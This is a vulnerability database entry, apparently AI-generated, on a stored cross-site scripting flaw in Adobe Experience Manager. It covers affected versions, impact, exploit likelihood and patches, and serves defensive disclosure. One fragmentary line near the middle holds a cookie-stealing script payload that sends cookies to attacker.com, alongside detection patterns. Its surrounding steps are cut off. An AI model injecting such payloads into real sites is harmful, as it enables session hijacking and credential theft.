
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-79905 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) that allows a low-privileged attacker to inject malicious scripts into vulnerable form fields. When a victim browses to a page containing the affected field, the injected JavaScript executes in their browser. Affected products include Adobe Experience Manager 6.5 (versions up to and including 6.5.24), Adobe Experience Manager 6.5 LTS (up to and including SP2), and AEM as a Cloud Service (versions up to and including 2026.7.0). The vulnerability was disclosed and patched on September 8, 2026, with a CVSS v3.1 base score of 5.4 (Medium) (Adobe Advisory, GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) variant. A low-privileged attacker can submit malicious JavaScript payloads into vulnerable AEM form fields; the application fails to properly sanitize or encode this input before rendering it to other users. Exploitation requires network access, low privileges, and user interaction (a victim must visit the page containing the injected content), and the scope is changed — meaning the injected script can affect resources beyond the vulnerable component itself (Adobe Advisory, GitHub Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of other AEM users who view the compromised page, resulting in low confidentiality and low integrity impact with no availability impact. Potential consequences include session hijacking, credential theft, unauthorized actions performed on behalf of victims, and defacement of AEM-hosted content. Because the scope is changed, the injected script may affect resources or users beyond the directly vulnerable AEM component (Adobe Advisory, GitHub Advisory).
There is no known public proof-of-concept exploit and no evidence of in-the-wild exploitation as of the time of disclosure (Adobe Advisory). The NVD SSVC assessment confirms exploitation is "none" and the attack is not automatable. The EPSS score is approximately 0.277%, placing it in the 20th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable form field and save or submit the form.%3Cscript%3E, <script>, onerror=, javascript:) in form field parameters.Adobe has released patches addressing this vulnerability: upgrade to AEM 6.5.25.0 or later, AEM 6.5 LTS SP3 or later, or AEM as a Cloud Service version 2026.8.0 or later (Adobe Advisory). As interim mitigations, administrators should implement a Content Security Policy (CSP) to restrict script execution, validate and sanitize all user input on form fields server-side, and restrict low-privileged user permissions to prevent modification of sensitive form components where possible. Applying the vendor patch is the recommended and definitive remediation.
The vulnerability was covered in CIS Security's advisory on multiple Adobe product vulnerabilities released in September 2026, noting the potential for arbitrary code execution across the Adobe product suite (CIS Advisory). Tenable published detection plugins for the vulnerability, and AUSCERT issued a bulletin (ESB-2026.10696) to notify its constituency. No significant independent researcher commentary or social media discussion has been identified beyond routine vulnerability tracking.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."